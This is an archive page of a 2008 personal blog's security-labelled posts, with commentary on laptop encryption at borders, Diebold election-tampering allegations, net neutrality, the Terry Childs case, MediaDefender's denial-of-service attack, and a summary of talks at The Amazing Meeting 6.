Showing posts with label security.

Friday, August 01, 2008

Expert tells China visitors to encrypt data as U.S. announces policy of laptop seizure

I saw two articles this morning which I think invite comparison. First, Phil Dunkelberger, CEO of PGP Corporation, says people visiting China should take laptops with no data, or encrypt what data they have:

Travelers carrying smart cell phones, blackberries or laptop computers could unwittingly be offering up sensitive personal or business information to officials who monitor state-controlled telecommunications carriers, Dunkelberger said.

He said that without data encryption, executives could have business plans or designs pilfered, while journalists' lists of contacts could be exposed, putting sources at risk.

Dunkelberger said that during unrest in Tibet in March, overseas Tibetan activists found their computer systems under heavy pressure from Chinese security agencies trying to trace digital communications.

"What the Chinese tried to do was infiltrate their security to see who in China the Tibet movement was talking to," he said.

...

Dunkelberger, whose firm serves many multinational corporations operating in China, said, "A lot of places in the world, including China, don't have the same view of personal space and privacy that we do in the United States."

"You've got to suspect that every place you're doing work is being monitored and being watched," he said.

Dunkelberger's advice is good as far as it goes. Of course, PGP Whole Disk Encryption won't help protect data in transit, and while PGP Email will protect the content of email messages, it won't conceal the source and destination. The threat described is one where traffic analysis alone can reveal a lot, and so you'd want to make use of a corporate VPN, some kind of proxy, or a system like Tor if you want to protect information about where your Internet traffic is ultimately going. PGP is a good company that makes great products; my employer uses PGP Whole Disk Encryption and Email products.

The second article, however, casts some doubt on the last part of what Dunkelberger says. It looks like the U.S., where the NSA engages in warrantless wiretapping with the assistance of the large incumbent telecoms (and a spineless Congress gives them immunity for violations of the law), and the CIA spies on foreign visitors within the borders of the U.S. in conjunction with the FBI's counterintelligence division, isn't so different from other countries. It's now publicly admitted by DHS that Immigration and Customs Enforcement officers have the right to seize laptops and other electronic devices from people entering the U.S. and hang on to them indefinitely in order to search them. Therefore Dunkelberger's advice should be taken by anyone coming into the U.S., as well--use blank laptops or laptops with encryption only. Some companies have begun to only allow employees to have a web browser and a VPN client on their laptops, and keep all data in the corporation, which can completely eliminate this particular governmental risk.

Sunday, July 20, 2008

Did Diebold tamper with Georgia's 2002 elections?

Former McCain advisor and security researcher Stephen Spoonamore suggested at a press conference on Thursday that Diebold tampered with Georgia's 2002 elections for Governor and Senator, in which Republican Sen. Saxby Chambliss defeated incumbent Democrat Sen. Max Cleland. Spoonamore was given a copy of a patch applied to Diebold machines in two strongly Democratic counties, DeKalb and Fulton, by Diebold CEO Bob Urosevich, allegedly in order to fix a clock-related problem. Spoonamore found that the patch did nothing to correct the clock problem, and contained two copies of the same program, but was unable to determine exactly what it did without access to the Diebold hardware. He has supplied a copy of the patch, which he obtained from a whistleblower in the Georgia Secretary of State's office, to the Department of Justice.

Saturday, July 19, 2008

Netroots and telecom

There's a telecom panel at the Netroots Nation conference today on the subject of "Big Telecom: An Emerging Threat to Our Democracy?" The implied answer is yes, and it appears that every participant on the panel will be making that case. Here's the description of the panel:

Massive telecom companies control virtually all of our voice and internet communications these days—and new evidence shows a near-total lack of commitment to our democracy. AT&T has proposed filtering all content traveling on its network. Verizon tried initially to block NARAL's pro-choice text messages. Most telecom companies are fighting net neutrality. Can democracy survive an assault by those who control the tubes?

The panel members don't include anyone with any experience managing or operating an actual telecom network, but instead include two people who have repeatedly demonstrated not only an ignorance of telecom law, technology, and policy, but who have misrepresented facts and failed to engage with the arguments of their critics, Matt Stoller and Timothy Karr (see posts on this blog in the "net neutrality" category). The closest person to a representative of a telecom is Michael Kieschnick of Working Assets, a company that is a reseller of long distance and wireless service on Sprint's network.

I agree with many of their positions--I don't think ISPs should be allowed to block websites on the basis of disagreement with content. I think ISPs should be transparent about their network management processes and filtering. Where I disagree with them is that they advocate that the FCC step in to regulate the Internet in a way that it has never had authority to do before, and demand that network operators not be allowed to implement classes of service with different rates of charges, or even usage caps. Art Brodsky expresses the point which has also been made by Robb Topolsky of Public Knowledge, Timothy Karr of Free Press, and Matt Stoller:

In the name of "network management," some companies want to throttle down the use of legal applications, like BitTorrent which may, coincidentally, provide competition in entertainment programming. They want to impose usage caps across the board on all customers which would stifle innovation and curb the use of video (there's that anti-competitive meme again) without actually solving the problem of the so-called "bandwidth hogs." The way caps are being discussed now, they would only lead to higher prices and less usage for an industry that already charges more for less than most broadband providers around the world. Parts of our broadband industry may be the only sector in the world that wants to cut down the amount of its product it wants customers to use.

Brodsky's last sentence is clearly false--broadband is like a fixed-price all-you-can-eat buffet. All businesses want to maximize their profits by maximizing revenue and minimizing costs. When bandwidth is sold at a fixed cost in unlimited amounts, where a small number of users are consuming the majority of the service, it's in the business's interest to restrict those users or charge them more for what they consume in order to satisfy the rest in a cost-effective manner. The options are few--you can either restrict the "bandwidth hogs" in some way, charge them more so that they pay for what they use, or raise the price for everyone. These guys seem to advocate the latter approach, while I'm in favor of allowing all the options to be used in a competitive market. Where I disagree with Comcast's approach in issuing RST packets to block BitTorrent traffic is not that they did it, but that they were not transparent about what they were doing (and apparently didn't get it quite right--it should not have completely broken BitTorrent, but only slowed it down).

Brodsky's suggestion that Comcast has an interest in blocking BitTorrent because it provides competition in the entertainment space is absurd--they have an interest in blocking it because it's a very popular application which itself exploits Internet protocols in a way not anticipated by the designers in order to consume more bandwidth, getting around the congestion controls in TCP/IP by using multiple TCP streams. If BitTorrent traffic wasn't filling up the majority of Comcast's bandwidth, they'd have no interest in it, except when the MPAA and RIAA issue them subpoenas about their users infringing copyrights.

If the government prohibits the use of differential classes of service (which is already heavily used by private companies to give priority to applications within their enterprise which have requirements for low latency and jitter, such as real-time streaming audio and video, including Voice over IP) and requires that congestion be dealt with by building out infrastructure sufficiently that there will never be congestion no matter how many users max out their connectivity with BitTorrent, that will reduce competition by culling smaller companies out of the picture and making market entry more difficult. In any environment where a provider's upstream capacity is less than the sum of the capacity to every customer (and that's everywhere, today, and always has been), all-you-can-eat bandwidth is like a commons. The more that is available, the more the heavy users will consume, to the detriment of each other and the light users. Without setting caps and having tiered pricing or implementing technology that prioritizes packets and drops from the heavy users and from less-realtime-sensitive applications first (like BitTorrent), there are no incentives against consuming everything that is available.

I also think it's a huge mistake to have the FCC start regulating the Internet. FCC chairman Kevin Martin would no doubt love to place indecency standards and filtering requirements on Internet content. Once you open the door to FCC regulation of the Internet, that becomes more likely. And the FCC has been completely ineffectual at dealing with existing abuses like fraudulent telemarketing, illegal prerecorded calls to residences and cell phones, caller ID spoofing, etc., already covered by statute and regulation. I'd rather see clear statutes that include private rights of action than entrust control of the Internet to the FCC. The FCC is a slow-moving bureaucracy, and AT&T and Verizon have the deepest pockets, the most lawyers, and the most personnel who have shuffled back and forth between government (including the NSA) and industry. That gives AT&T and Verizon the tactical advantage, and leads to less competition rather than more.

Which brings me to the warrantless wiretapping and telecom immunity issues, which Cindy Cohn of the EFF no doubt addressed on the Netroots Nation panel. I suspect I have little if any disagreement with her. I've long been a supporter of the EFF, as are many people involved in the management of ISPs. I strongly oppose telecom immunity for warrantless wiretapping, a complete abdication of Congress' responsibility to support the U.S. Constitution. But this shows the power of AT&T and Verizon. Not only did they get what they wanted, but the very infrastructure which was built to do this massive interception of traffic for the NSA and for law enforcement interception under the CALEA laws was built for them with assistance from government funds. All telecoms have to be compliant with CALEA (now including VoIP and broadband Internet providers), but the big incumbents who were most capable of affording it on their own got it at the lowest costs, while their competition was required to build it out at their own expense even if it never gets used.

But there are legitimate uses for deep packet inspection, for understanding the nature of the traffic on a network for management purposes, including tracking down security and abuse issues. Since it is in the hands of the end user to use encryption to protect sensitive content, I think use of DPI by network providers is reasonable for the purposes of providing better service in the same way that it's reasonable for a voice provider to intercept traffic for quality measurement purposes. It's also reasonable for interception to occur for "lawful intercept," but it should always require a court order (i.e., both executive and judicial branch approval) on reasonable grounds. The difficulty of obtaining wiretaps depicted in the television program "The Wire" is how it should be.

I've written a lot on these issues, much of which can be found in this blog's Network Neutrality Index.

If any reader of this blog happens to have attended the Netroots Nation telecom panel or comes across a description of its content, please point me to it, as I'd like to see what was said. I don't have high hopes for the accuracy or reasonability of statements from Stoller and Karr, but I could be surprised, and the other panelists probably had interesting and important things to say.

(See my Blogger profile for the disclosure of my employment by Global Crossing, which is currently listed by Renesys as the #3 network provider on the Internet in terms of number of customers, ahead of AT&T and Verizon, behind Sprint and Level 3.)

UPDATE: The "Big Telecom" panel was live-blogged (dead, unarchived link: http://openleft.com/showDiary.do;jsessionid=C865142FFB85E14AAD27045B9A342B15?diaryId=7032). Stoller's anecdote about the Bill of Rights on metal is referring to Dean Cameron's "security edition" of the Bill of Rights, which was also promoted by Penn Jillette.

San Francisco's city network held hostage

The mainstream media has reported the arrest of the City of San Francisco's network administrator, being held on $5 million bond, as though he had secretly taken control of the city's network and servers and held them hostage, and implies that he has access to data stored on servers on the network. The reality, however, appears to be somewhat different.

Paul Venezia at InfoWorld has dug a little deeper, and found that Terry Childs, a Cisco Certified Internetwork Expert (CCIE, Cisco's top certification), was responsible for managing San Francisco's "FiberWAN" MPLS network, which he, though not the top network architect, built and managed himself. He has always been the only one with access, which he protected vigorously for fear that no one else around him was competent to do so. His paranoia seems to me excessive and misplaced--the risk of no one else having access is itself a single point of failure, and the fact that he originally refused to write remote configuration to flash, meaning that in the event of power failure the devices would not come back up and function properly without intervention, shows him to be a bit off.

Childs never "tampered" with any system or network device to take it hostage; he simply maintained control of what he built and refused to give others access to it. He never has had control of any servers or databases apart from the ones directly involved in managing the network, such as the authentication servers for the network. So the talk of data being stored on the network including "officials' e-mails, city payroll files, confidential law enforcement documents and jail bookings" appears to be irrelevant. Nothing has been done to prevent anyone from accessing any of those things or to gain unauthorized access to them; the network is still up and functioning normally, and Childs didn't have any special access to or manage or control the host-level access to the servers with that data. Now, he was probably able to intercept data transmitted on the network (necessary for troubleshooting), but if sensitive data was only accessed via encrypted sessions, even that risk wouldn't exist.

Childs' problem appears to be that he was overprotective, untrusting of the competence of his peers and management (perhaps with some justification), and placed technological purity and security over business requirements. Not unusual features for people with a very high level of technical skill.

Check out Venezia's article--it looks to me like he's got the goods on this story.

UPDATE (July 23, 2008): Childs gave up the passwords to San Francisco Mayor Gavin Newsom, after a secret visit arranged by his attorney, Erin Crane, with the mayor. Childs' attorney's statements are consistent with Venezia's article:

In her motion to reduce bail, Crane said Childs had been the victim of a "bad faith" effort to force him out of his post by incompetent city officials whose meddling was jeopardizing the network Childs had built. At one point, she said, Childs discovered that the network was at risk of being infected with a computer virus introduced by a colleague.

"Mr. Childs had good reason to be protective of the password," Crane said. "His co-workers and supervisors had in the past maliciously damaged the system themselves, hindered his ability to maintain it ... and shown complete indifference to maintaining it themselves.

"He was the only person in that department capable of running that system," Crane said. "There have been no established policies in place to even dictate who would be the appropriate person to hand over the password to."

The defense attorney added that "to the extent that Mr. Childs refused to turn over the password ... this was not a danger to the public."

Childs intends to fight the computer tampering charges:

Referring to the felony computer-tampering counts, Crane said, "Mr. Childs intends to not only disprove those charges, but also expose the utter mismanagement, negligence and corruption at (the Technology Department) which, if left unchecked, will in fact place the city of San Francisco in danger."

UPDATE (September 11, 2008): Venezia has a new story about the latest round of motions in the Childs case, where the prosecution has filed some apparently technically inept documents. I've also come across an affidavit supporting Childs' arrest from SFPD Inspector James Ramsey (PDF), which presents a very strong case that Childs was up to no good--he had set up his own racks of equipment including modems in a training room, was running his own mail servers and intrusion detection systems, and connecting his own personal equipment to the network. He had cut holes in a locked cabinet next to his cubicle to run cables into them, where he had placed a dialup modem and a computer to allow himself unauthorized access to the city network. The guy seems like a bit of a nut who was engaged in some highly inappropriate behavior meriting termination and criminal prosecution.

UPDATE (August 22, 2009): The judge in the Childs case, Superior Court Judge Kevin McCarthy, has dismissed three charges of tampering, leaving one count related to his initial refusal to give up the passwords, which has a maximum sentence of five years. Childs has served over a year in jail, due to his inability to raise $5 million in bail. He will appear in court on Monday regarding the final charge. Childs gave up the passwords to San Francisco mayor Gavin Newsom after spending eight days in jail.

Tuesday, July 01, 2008

Keith Olbermann flip-flops on telecom immunity

How sad to see political partisanship turn him into an advocate for bad legislation. The telecoms shouldn't get civil or criminal immunity for violations of our constitutional rights.

UPDATE (July 8, 2008): Ed Brayton comments on Obama's attempt to explain his change of position on this issue.

Monday, June 30, 2008

The Amazing Meeting 6 summarized, part three

This is part three of my summary of The Amazing Meeting 6 (intro, part one, part two, part four, part five).

Friday night was my one late night out, as I went with a group of Denver and Boston skeptics (and one local friend) to Gallagher's Steakhouse at the New York, New York Casino. On the walk down the strip, we passed some 9/11 truthers holding signs promoting a website promoting their views. I told one that he should check out 911myths.com, to which he responded, "That's funny." He ended up going off on a rant about how I was sticking my head in the sand, to which I unproductively responded in an off-color manner about where he was sticking his head. We had a fantastic, though expensive, meal, and I ended up leaving my camera at the restaurant. Fortunately, I was able to retrieve it even though the restaurant had closed.

Saturday morning I had breakfast with an attorney from Florida and a regular attendee of hacker's conferences from Pennsylvania; we talked a bit about criminal hacking on the Internet and copyright law.

Michael Shermer on the Skeptologists and why people believe in unseen things

Michael Shermer gave the first talk of the day. He began by talking about how he recently accepted some money from the Templeton Foundation in return for editing a booklet of thirteen essays on the question "Does science make belief in God obsolete?", which he agreed to do on the condition that he could pick at least some of the people to write answers to the question. Respondents included Kenneth Miller, Victor Stenger, Christopher Hitchens, Steven Pinker, and Stuart Kauffman.

He then showed a segment from a TV show pilot, "The Skeptologists," that is now being pitched to the TV networks. The show features Yau-Man Chan, Mark Edward, Steven Novella, Phil Plait, Kirsten Sanford, Michael Shermer, and Brian Dunning investigating claims using the tools of skepticism. The segment shown was of Shermer, Sanford, and Novella investigating health claims made for wheat grass, such as that because it contains chlorophyll which is molecularly similar to hemoglobin, it turns into hemoglobin when you consume it.

Shermer then went on to give a talk about "why people believe in unseen things," arguing that we engage in learning by association (something illustrated by Banachek's memory workshop) and have a tendency to make type II errors (incorrectly accepting a belief in something false) over type I errors (incorrectly rejecting a belief in something true). He gave a brief review of some evidence that when we process a sentence in order to understand it, we go through the same steps as entertaining that it is true, and to exercise skepticism about it requires additional effort; disbelief requires a subsequent process of rejection after the process of comprehension. This kind of acceptance of knowledge presented by others makes sense for a child growing up, especially in a hostile environment where survival is at stake.

Humans also tend not to be persuaded by or even remember being told that something is false--the negation can be forgotten while the statement being denied is remembered as true. A flyer put out by the CDC to rebut myths about flu vaccines turned out to have the opposite of the desired effect, at least among certain groups of people--after 30 minutes, they remembered 28% of the false statements as being true, and after three days the percentage jumped to 40%. (Also see Sam Wang and Sandra Aamodt's op-ed in the June 27, 2008 New York Times, "Your Brain Lies to You.")

Shermer didn't mention the study I've linked to, but rather later near the end of his talk referred to some fMRI studies by Sam Harris, Sameer Sheth, and Mark Cohen (PDF) about evaluating statements as true, false, or undecidable, comparing reaction times to different types of statements.

Agency and the intentional stance

Shermer talked about the work of Pascal Boyer and Daniel Dennett on agency and the intentional stance--that we tend to assume by default that everything that happens not only has a cause, but is caused by an agent, and particularly one that means us harm. Such an assumption may make evolutionary sense to enable survival, though it clearly doesn't work well for accurate explanations of the world. But such appeal of agency lies behind intelligent design theory, and attributing supernatural intentions to natural phenomena. Shermer called this "The God Illusion" rather than "delusion," because he, like Boyer and Dennett, sees it as a normal cognitive illusion rather than something delusional or pathological.

He went on to talk about folk intuitions as being the engines of all sorts of beliefs. He gave examples from folk astronomy, folk biology (the elan vital), folk psychology (mind/brain dualism), and folk economics (centrally planned economies). He compared natural selection and Adam Smith's invisible hand, observing that many people misconstrue one or the other as being something magical or directed. He observed that we have folk intuitions that have evolved for a particular environment, yet do not work well at the huge or tiny scales.

Then, more controversially, he referred to folk politics, viewing societies as an extension of the family, and referred to "intelligent government theory," the "God of the government" theory, and "the government illusion," drawing an analogy to intelligent design, God of the gaps, and the God illusion, respectively. But where intelligent design says "I can't imagine how X could have evolved, therefore it must have been designed," he described "intelligent government theory" as based on the faulty reasoning that "I can't imagine how X could be done privately, therefore a government must do it." The difference here, as I've already mentioned, is that we know that governments exist and do provide services. The libertarian argument about private provision of services vs. government provision of services is one about whether government is necessary, or moral, or more efficient than private provision of services. To my mind, such arguments are well worth having, but come down to questions of competing values (e.g., liberty vs. justice) and empirical evidence about costs and benefits of competing approaches. It's not really analogous to the question of the existence or nonexistence of gods, unless perhaps one takes that to partly be an issue about the pragmatic value of belief in an illusion vs. truth.

Sharon Begley

Newsweek science writer Sharon Begley gave a talk titled "Creationism and Other Weird Beliefs: The Role of the Press," with a subtitle "hint: don't get your hopes up." She was very pessimistic about the press being helpful in promoting critical thinking. She began by telling the story of the Tichborne Claimant. In 1854, Roger Tichborne was lost at sea off the coast of Brazil. He had been raised in France to the age of 16, then in England. He was very thin, and had blue eyes and tattoos. His mother refused to accept that he was dead, and placed ads in newspapers seeking him. Some 20 years later, a man from Wagga Wagga, Australia contacted her, claiming that he had not previously contacted her because he wanted to achieve success on his own accord, under the name "Mr. Castro," but had failed to do so. This man, the Tichborne Claimant, was obese, spoke no French, had no tattoos, had brown eyes, and was an inch taller than Roger Tichborne, yet she accepted him as the genuine article.

According to Begley, the role of the newspaper is not to educate. In the early years of the AIDS crisis, public health officials asked for the press to run informative stories, and they complied, but this was not helpful because:
  • The scientific ignorance of the American public.
  • The capacity for rational thinking is not identical to the disposition to employ rational thinking.
  • There is a disconnect between factual knowledge and belief, as exhibited in the case of Mrs. Tichborne.
  • Public attitudes towards the press are negative.
  • The press has a commitment to "balance."
  • Common sense is not common.
She gave some statistics on polls of Americans' agreement or disagreement with the statement that "Human beings as we know them developed from earlier species of animals":

1985: 45% agreed, 48% disagreed, 7% unsure.
2005: 40% agreed, 39% disagreed, 21% unsure.

By comparison the percentage of agreement in Iceland, Denmark, and Sweden was over 80%; of OECD nations only Turkey had a lower percentage of acceptance than the U.S.

Evolution, gay marriage, and abortion are all highly politicized in the U.S. in a way that they aren't in Europe or Japan.

But if the question was "Can natural selection explain appearance and change over time of animals," 78% of Americans agreed. Yet 62% agree that "God created humans as they are today." This, according to Begley, is because Americans have a view of human exceptionalism.

She went through a list of facts that are beyond dispute, which were presented to Americans for acceptance or denial. Two examples:

More than half of all genes in humans are identical to those in mice. 33% agree
More than half of all genes in humans are identical to those in chimps. 38% agree

Only 9% of Americans know what a molecule is. Because of this, while sports writers can use abbreviations such as ERA and RBI without explaining them, Begley says she cannot assume her readers know anything at all, and recently learned that she can't even refer to DNA and expect her readers to know what she's talking about.

She observed that a disposition to critical thinking is associated with being more curious, open-minded, open to new experiences, conscientious, less dogmatic, less close-minded, less authoritarian, and likely to rely more on empirical and rational data than on intuition and emotion when weighing information and reaching conclusions. But you have to both have the skills and want to think critically in order to apply them. In addition to Tichborne as an example of someone who had the skills but didn't want to apply them, she noted that Sir Arthur Conan Doyle's son was killed two weeks before the end of WWI, and he went to a medium who claimed to contact his son, which he very much wanted to believe. Alfred Russel Wallace, who formulated evolution by natural selection parallel to Darwin, was also a believer in ghosts, levitation, spirit photography, and clairvoyance. And she noted that a statement Penn Jillette made the previous day sounded like he was rejecting climate change on the basis of a dislike for Al Gore. (UPDATE, July 4, 2008: Sharon Begley wrote about this at the Newsweek blog, and Penn Jillette responded in the Los Angeles Times. I think Penn more accurately reports what happened than Sharon Begley did--he really did say that he didn't know, and that people he knows and considers reliable tell him that anthropogenic climate change is real. One thing Penn gets wrong is that Teller didn't mention Gore's name when he said that carbon credits are "bullshit modeled on indulgences.")

She commented on some of the negative letters she has received any time she writes about evolution or critically about claims like alien abductions. When she wrote an article for the Wall Street Journal about the discovery of Tiktaalik, she received several letters which she read excerpts of, three examples of which were the standard argument that "evolution requires more faith" than believing that God did it, a letter asking "where are the billions of 'transition fossils,'" and one asking, "if you are terminal will you call on Darwin or God?"

Don't count on the press

The "reality-based community" must contend with contrarian politicians, the masses' distrust of elites, and new sources of news. With regard to the last point, she pointed out that Googling evolutionary biology terms often brings up Answers in Genesis sites prior to sites with accurate information.

The journalistic conceit of objectivity, she said, is imported from political disputes where there are two contrary sides. (I actually think that notion of balance is as often mistaken in politics as it is in science--there may only be one side with any valid support, or there may be more than two sides deserving of representation, though the latter is more common in politics than in science. But dualism is a misrepresentation in both circumstances.)

Uncommon common sense

Begley made the following points, which had some overlap with Shermer's talk:
  • Evolution is not intuitive.
  • Common sense can mislead us about the physical world.
  • Our brains are driven to see patterns.
  • We have a habit of imputing consciousness to inanimate objects.
  • Someone is staring at me from behind. (People tend to have and respond to such feelings. I can't remember if she actually discussed Rupert Sheldrake's studies of this, or of the skeptical critiques by Robert Baker or Richard Wiseman.)
She gave the example of an experiment with a sweater at Bristol University. Students were shown a ratty old sweater and asked who would be willing to put it on in return for a payment of twenty British pounds. Most indicated a willingness to do so. But if they were then told, oh, by the way, this sweater belonged to a murderer, many of the hands would go down--as though evil were a property that contaminated the object. What she didn't mention is that similarly, the value of something associated with someone of status has the reverse effect--e.g., if the sweater were claimed to belong to Einstein. The effect of status on objects is one that is clearly prevalent even among skeptics, who are as likely as anyone to enjoy collecting autographs and memorabilia, or objects like ping pong balls used on a television show (see Adam Savage's talk, below).

Derek and Swoopy
Derek and Swoopy, the hosts of the official Skeptics Society podcast, "Skepticality," gave a short talk about their show and noted that they now have about 35,000 listeners per program, and that the top two skeptics' podcasts, "Skepticality" and "The Skeptics Guide to the Universe," have over 4 million downloads between them. They reported that after some successful skeptical panels at science fiction conventions, Dragon*Con 2008 in Atlanta this Labor Day weekend, a conference so large that it occurs at four hotels, will have four full days of skeptical content, a "Skeptrack" featuring James Randi, Michael Shermer, Phil Plait, Ben Radford, Alison Smith, George Hrab, and others.

Steven Novella
Dr. Novella gave a talk on "Dualism and Creationism" covering the history of dualism in philosophy of mind, evidence from neuroscience, and a discussion of modern dualism. In his discussion of dualism in philosophy, he attributed to Descartes a notion of computation occurring in the brain and a position he called "consciousness dualism." I think perhaps that gives Descartes too much credit, though he did think that "animal spirits" flowing in the brain caused signals from perception to be projected on the surface of the pineal gland, which was the seat of the soul and consciousness.

He referred to the advocacy of property dualism/epiphenomenalism by David Chalmers, and observed that his views would not be acceptable to most of those who advocate dualism. Chalmers's position is that most mental activity is physical brain activity, but there's a remaining hard problem of consciousness posed by the conscious properties of perception and feeling known as qualia, which distinguish unconscious zombies that could behave just like us from real people. He gave Deepak Chopra as an example of an individual who is essentially a denialist about contemporary neuroscience, an anti-materialist who supports "quantum woo," Eastern mysticism, and what he called "substrate consciousness," a feature of the universe itself.

Evidence from neuroscience
Novella gave the following points to summarize the evidence from neuroscience:
  • Brain anatomy and activity correlates with mental activity.
  • There is no mind without the brain.
  • Brain development correlates with mental development.
  • If you damage the brain, you damage the mind.
  • Different states of consciousness correlate with different brain states.
  • Turn off the brain and you turn off the mind.
  • The mind does not survive the death of the brain.
  • MEG (magnetoencephalography) can be used to provoke specific mental effects, including inducing out-of-body experiences at will.
My notes on the last point suggest that Novella said that MEG could be used to induce OBEs. There were a couple of recent studies about two different methods for inducing OBEs, but I don't recall either of them using magnetic induction (e.g., this 2007 Science paper). I'm skeptical of Michael Persinger's claims of magnetic induction of religious experiences (also see this 2004 Nature article).

We're in the process of reverse-engineering the brain, and the materialist model of consciousness is working pretty well. The elements of consciousness are increasingly identifiable and localizable, and our ability to reconstruct them in artificial intelligence will be the ultimate test.

Novella defined consciousness as the moment-to-moment functions of the brain, when it is processing information reflectively, and presenting it to the part of the brain that is paying attention. (Is it really commonly accepted that attention is localized to a particular part of the brain?) We are trying to assess our consciousness with our consciousness.

The vitalism analogy
Novella stated, referencing Daniel Dennett, that just as life is an emergent property of living things, consciousness is the sum of the easy problems about consciousness, leaving no remaining residue of a hard problem, just as there is no elan vital for biology.

Egnorance
Novella then talked about neurosurgeon Michael Egnor, who he said makes the mistake of confusing the question of "does" with "how." That is, because we don't know the details of how consciousness is physically generated, it must not be the case. He compared this to the "God of the gaps" argument--whatever is currently unexplained must be caused by something supernatural.

Defenses of dualism
Novella then went through a few rhetorical strategies used to defend dualism. One is that any day now, evolution (or materialism) will collapse. But they've been saying this in the evolution case for 100 years. (Glenn Morton has a nice article titled "The Imminent Demise of Evolution: The Longest Running Falsehood in Creationism," which offers 178 years of such quotes.)

Another is to generate false controversy, and say that until the argument is resolved, it's legitimate to accept dualism.

Then there's the claim of impending acceptance, the converse of the imminent demise argument--that Deepak Chopra's views are about to be accepted by the entire world, for example.

The need to change science--Novella said that B. Alan Wallace, a Buddhist, has argued that we need to reintroduce subjective evidence into science. Novella suggested that subjective evidence can't be scientific evidence, which I think is a slight overstatement--a self report is a valid source of data, we just need to have a way to correlate those self reports with other evidence.

In his conclusion, Novella stated that the purpose of modern Cartesian dualism is to provide intellectual cover for a belief system--presumably including various religious views about immortality as well as Deepak Chopra's views.

It's worth noting that Keith Augustine of the Internet Infidels has done a lot of work presenting the evidence against survival of death and the possibility of immortality, as well as critiquing claims that near-death experiences are evidence of survival. He has recently published a four-part series of articles in the Journal of Near-Death Studies on the subject, which have been accompanied by responses from NDE researchers. He is also working on an anthology which will respond to recent arguments for dualism. I urge Novella to contact Augustine, as he might have some contribution to make to that anthology.

Jeff Wagg
Jeff Wagg of JREF stated that there is a possibility of a future TAM in the UK, and that TAM7 will be in Las Vegas on July 9-12, 2009 at the South Point Casino. There will also be a JREF Mexican Riviera cruise in March, 2009, which still is looking for speakers.

Jim Underdown
Jim Underdown of the Center for Inquiry, Los Angeles reported that the Independent Investigations Group, a skeptical group that does paranormal investigations, would be giving an award for best TV show or movie that debunks pseudoscience to Penn & Teller's Bullshit!, and a lifetime achievement award to James Randi.

Randi came up and said that some years ago he had terminated his relationship with CSICOP because they had asked him to stop going after Uri Geller, who was suing him repeatedly (and had also sued CSICOP as a result). Randi said that Geller only won once, in the Japan case, where the judgment was lowered from slander to insult, and that while Geller was suing for millions he was only awarded a small amount. The amount was 500,000 yen against Randi, and a larger amount against the Japanese magazine which reported Randi's erroneous statement that Dr. Wilbur Franklin of Kent State University had killed himself after Randi discredited Geller, who Franklin had endorsed as genuine. Franklin had actually died of natural causes, and Randi attributed the Japanese magazine statement to a mistranslation of the phrase "shot himself in the foot," though Randi had been quoted in a U.S. publication in English making the same statement about Franklin killing himself out of embarrassment over Geller's exposure. Geller also won a case in Hungary for a statement by Randi that called Geller a swindler, though Randi was not named in that suit. After Geller sued Victor Stenger in Hawaii, CSICOP and Prometheus in England, and CSICOP and Prometheus in Miami, Prometheus Books added errata slips to Stenger's Physics and Psychics and to Randi's The Truth About Uri Geller regarding an incident where Geller was sued in Israel for breach of contract and not, as those two sources stated (Stenger relying upon Randi), "arrested." The Miami suit was eventually won by Prometheus and CSICOP on the grounds that Geller had knowingly filed after the statute of limitations had expired, and Geller paid them slightly less than half of the fees, costs and sanctions that were originally awarded and dismissed his appeal. 
Contrary to the impression Randi has sometimes given, the vast majority of Geller's lawsuits were not about paranormal abilities, but about accusations of other kinds of impropriety, such as fraud, criminal acts, plagiarism, and so forth. Geller gives his version of events on his web page.

Now, apparently as a result of this award, Randi said he would like to forgive and forget, and resume his relationship with CSICOP (now CSI).

The Skeptologists
During lunch was a showing of the full pilot episode of "The Skeptologists," which also included a segment on the tools used for ghost hunting, testing them aboard the Queen Mary in order to see what they actually measure. I missed all but the ending, but it was shown again on Sunday, about which more later.

There were several more speakers on Saturday--Phil Plait, Adam Savage, Matthew Chapman, Richard Wiseman, and a panel discussion ostensibly on "the limits of skepticism," but I'll save that for further summary tomorrow.

On to TAM6 summary, part four.

Monday, June 02, 2008

Heathrow security confuses the map for the territory

A man wearing a Transformers t-shirt was stopped by airport security at Heathrow Terminal 5 because the cartoon character on the shirt was depicted holding a gun.

This is about as idiotic as Michelle Malkin's opposition to Rachael Ray wearing a paisley scarf that resembled a keffiyeh--even after she admitted it was a paisley scarf.

Thursday, May 29, 2008

MediaDefender launches denial of service attack against Revision3

Anti-piracy company MediaDefender, which defends its clients' intellectual property by disrupting the content on peer-to-peer networks, launched a denial of service attack (SYN flood) against Revision3 over Memorial Day weekend. The attack was launched after Revision3 discovered that their servers were being used by MediaDefender to post spoofed BitTorrent index files and Revision3 shut off their access.

Revision3, a legitimate company that distributes HD video over the Internet using BitTorrent, was not amused, and the FBI is investigating.

Any legitimate Internet provider should refuse to provide services to companies that engage in illegal or immoral tactics to try to stop peer-to-peer piracy of copyrighted content, such as denial of service attacks or interference with services that are being used legitimately, even if they are also being used for piracy. If they don't have methods which can be targeted specifically against the copyrighted content they are authorized to protect, then their methods cross the line, in my opinion.

MediaDefender's upstream network providers are Savvis (ASN 3561), Beyond the Network (ASN 3491), WV Fiber (ASN 19151), and SingTel (ASN 7473). They all should have a problem with denial of service attacks by their customer.

MediaDefender was previously in the news in September 2007 when its security was breached by hackers and 700 MB of executive emails and the content of VoIP telephone calls from the company were leaked to the Internet. This seems to me like a company that should not be in business.

Thursday, May 15, 2008

Pre-flight cocktails

The Washington Post reports that there have been more than 250 recent cases of the Department of Homeland Security's Immigration and Customs Enforcement (ICE) agency giving "pre-flight cocktail" injections of psychotropic drugs to foreigners being deported. These injections of antipsychotic drugs have been given to people with no history of mental illness and for no medical justification, with the only apparent purpose to sedate them during their flights.

The practice of "involuntary chemical restraint of detainees" without medical justification violates some international human rights codes, according to the Post, and is banned in several countries. Confidential documents obtained by the newspaper indicate that in some of the cases they report, detainees were not able to be given additional injections during layovers because to do so would be illegal in the countries in question.

These sedations violate the government's own rules, which only permit sedation if the individual has a mental illness which requires the drugs or if the person is aggressive to the point of creating a danger to those around them.

The Post reports that during 2007, there were 67 people deported with medical escorts with no medical justification, 53 of whom were given psychiatric drugs, and 48 of whom had no documented history of violence. Most of those given drugs appear to be individuals who had previously resisted deportation.

One man deported to Nigeria was still under the effects of the drugs for four days after his arrival.

One drug often reported used was Haldol, which created some controversy during George H.W. Bush's presidency when it was reported that he took the drug to avoid jet lag; some speculated that this drug was the cause of his vomiting at a dinner with (and vomiting on) the Prime Minister of Japan.

A related story in the Post looks at 80 cases of deaths of immigration detainees, of which 30 were found to be "questionable," including two in Arizona.

(Via The Agitator.)

Tuesday, May 13, 2008

